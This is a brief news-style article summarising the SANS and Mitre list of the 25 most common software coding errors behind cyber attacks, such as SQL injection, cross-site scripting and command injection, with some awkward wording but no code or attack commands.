Software experts highlight about 25 universal bugs exploited by hackers.
Some of the software programming errors are responsible for virtually every major type of cyber attack, starting from the recent intrusions at Google, down to the disruptions and infringes of network security at private utilities and government agencies. This is according to a report published by two non-profit technology research organizations.

SANS (SysAdmin, Audit, Network, Security) Institute and Mitre are two sources of the information, wherein the identified 25 frequent coding errors putting mission critical systems at risk are enabling security bugs, cyber spying and cyber crime. Security analysts took action at a variety of organizations including the National Security Agency and the US Department of Homeland Security’s National Cyber Security Division.

The most common programming errors leading to security breaches are cross-site scripting flaws, SQL injection errors, and buffer overflow vulnerabilities.

SQL injection and Cross-site scripting are among the security weaknesses in 2010. This is what the researchers found out and even when a software package is not running on the web, there is a posibility that it has a web-based management interface or HTML-based output formats and that allow cross-site scripting. For data-rich software applications, SQL injection will give way to stealing the keys.

The other top vulnerabilities identified by the study were weak access control, cross site request counterfeit flaws, overly permissive default settings, and authentication mechanisms, a shortage in encryption support.

The researchers have divided the Top 25 risky software errors into three high-level categories named: porous defenses, risky resource management and insecure interaction between Components.

The “porous defenses”, weaknesses related to defensive techniques are often misused, abused, or just disregarded. On the other hand, the “risky resource management errors” category commonly occurs when software does not properly manage the creation, transfer, usage, or destruction of important system resources.
Insecure interaction between components includes many ways in which data is sent and received between separate components, processes, programs, modules, threads, or systems.

Researchers say that it seems as if software is all about the data, where it is set into the database, then pulled from it, massaged into information, and sent elsewhere for fun and profit. If attackers influence the SQL that you use to communicate with your database, then in short, all your fun and profit belongs to them. If you use SQL queries in security controls like authentication, attackers could alter the logic of those queries to bypass security. They modify the queries to corrupt, steal, or simply hack and change your underlying data. They can get data one byte at a time if they have to, and they really know what they are doing, most of the times, it pleases them.

Most of the time, software becomes the bridge between an outsider on the network and the internals of an operating system. Researchers say that as you are invoking another program on the operating system, while allowing untrusted inputs to be fed into the command string generated for executing that program, you will give way to attackers by executing their own commands instead of yours.

To eliminate the prominent programming errors, all users and experts need to unite to destroy the evil agenda of the cyber criminals. There should be no persistent threat from competing nation states. What a life we have if the internet will be hackers-free.